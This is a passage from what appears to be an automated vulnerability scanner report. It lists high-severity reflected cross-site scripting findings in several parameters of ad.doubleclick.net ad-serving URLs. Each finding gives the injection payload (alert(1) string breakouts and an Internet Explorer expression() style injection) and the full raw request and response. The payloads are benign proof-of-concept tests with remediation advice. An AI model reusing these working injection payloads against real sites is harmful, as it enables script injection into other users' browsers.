Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 537

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;0-0;0;31680223;1839-230/70;31981065/31998941/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;&b5a17"style="x:expression(alert(1))"c28df2770ea=1;~aopt=6/0/ff/0;~sscs=%3fhttps://www.wsjwine.com/discovery_offer.aspx?promo=2033001">
...[SNIP]...

3.29. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 was submitted in the u parameter. This input was echoed as 73876"style="x:expression(alert(1))"392e3d7bbf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623;73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 429

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/l;44306;0-0;0;31680223;31596-2/94;0/0/0;u=;~okv=;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;73876"style="x:expression(alert(1))"392e3d7bbf7;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

3.30. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd5ff'-alert(1)-'9030ba385d0 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

3.31. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ed56"-alert(1)-"dde2af71df5 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

3.32. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86415'-alert(1)-'b736f4a5c56 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5979
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:38 GMT
Expires: Mon, 14 Feb 2011 01:44:38 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3aae/7/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56http://lp2.turbotax.com/ty10/bn/gdestp?cid=bn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_&priorityCode=4654700000\">
...[SNIP]...

3.33. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7261e"-alert(1)-"ebc0bfc526f was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6299
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:34 GMT
Expires: Mon, 14 Feb 2011 01:44:34 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3aae/7/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f?cid=bn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250&priorityCode=4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

3.34. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f824'-alert(1)-'78ddba2521c was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

3.35. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d629c"-alert(1)-"dabc82fe9a7 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:49:06 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

3.36. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aaee'-alert(1)-'64021cf45b7 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

3.37. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a69"-alert(1)-"441cf269a49 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:49:06 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlCli
...[SNIP]...

3.38. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca60b"-alert(1)-"9ecef699118 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

3.39. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcb10'-alert(1)-'29a07cd16fe was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

3.40. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
